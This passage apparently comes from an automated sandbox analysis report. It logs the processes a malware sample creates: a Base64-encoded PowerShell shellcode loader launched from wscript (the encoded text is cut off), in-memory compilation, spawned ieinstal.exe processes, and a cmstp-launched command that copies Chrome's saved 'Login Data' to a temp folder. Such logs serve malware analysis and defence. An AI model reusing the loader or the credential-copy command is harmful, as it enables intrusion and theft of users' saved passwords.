      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: <